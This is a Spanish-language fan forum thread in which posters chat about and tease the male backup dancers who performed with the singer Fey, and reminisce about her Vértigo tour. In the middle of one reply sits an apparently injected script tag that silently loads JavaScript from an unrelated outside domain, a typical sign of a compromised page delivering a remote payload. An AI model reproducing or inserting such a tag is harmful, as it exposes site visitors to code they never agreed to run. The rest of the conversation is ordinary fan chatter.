Responder
¡Bienvenido! Para que puedas participar, intercambiar mensajes privados, subir fotos, dar kudos y ser parte de las conversaciones necesitas estar ingresado en los Foros. | Ingresa | Regístrate Gratis
Acero
ethernalmoon

Re: Duda; Los Bailarines Hombres De Primera Fila???

JA! :risa:
Senior
joseyfey

Wow que padre que fueron 4 que bailaron con fey! Y si,no esta nada mal el de short blanco y el de mono azul ajaja lo importante es que fueron bien masculinos y varoniles entonces :smileyhappy: muero por ver el primera fila para verlos mejor ajajaja lastima q no bailaron todas las coreografias(imagino que porque algunas son muy sosas) jajaja
Senior
jehuroth

haganse, acá hay mucha necesitada, no dudarian en hecharselos :smileytongue:

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Senior
joseyfey

Ajajaja tanto asi tampoco! Pero si estan guapos :smileyhappy: jaaaaa
Bronze
feysilverboy

Lo que fey debio hacer fue contratar a los de vertigo... pero seguramente el presupuesto no alcanzaba para tener tamaño nivel de bailarines como esos que estaban realmente a nivel internacional... otra cosa...  pero bueno.. eso apenas para algo tambien tan internacional como vertigo fue...   xD   el insuperable y traumatizante vertigo que hasta hoy no podemos olvidar    u  _u   ni aceptar que merecia mucho mucho mas... 

marykateeslamejor
Temas: 2,805
Kudos: 88

los de vertigo ya han de ser todos unos señores! jaja
Papel
4everfeyhp

marykateeslamejor ha escrito:
los de vertigo ya han de ser todos unos señores! jaja

unos señores muy guaposs

- * YO CREO EN LA MÚSICA, DE LA FORMA EN QUE ALGUNAS PERSONAS CREEN EN LOS CUENTOS DE HADAS * -
Acero
power2richie

X que no van a zekeruelas.com y se enteran que esta haciendo Zele. Es fotografo. Yo me pregunto x que fey nunca lo contrato como fotografo?
Papel
4everfeyhp

stevenh2o ha escrito:

TODOS ENSAYAN LA COREO Y FAkE ....SENTADA:que_importa::risa:

Eres tu Steven0? el que puso ese mismo comentario en la foto de FB? :smileysurprised:

- * YO CREO EN LA MÚSICA, DE LA FORMA EN QUE ALGUNAS PERSONAS CREEN EN LOS CUENTOS DE HADAS * -
Papel
4everfeyhp

Zeke es el bailarin mas guapoa q ha tenido Fey en toda su hsitoria MAry! :smileyvery-happy: gracias x el link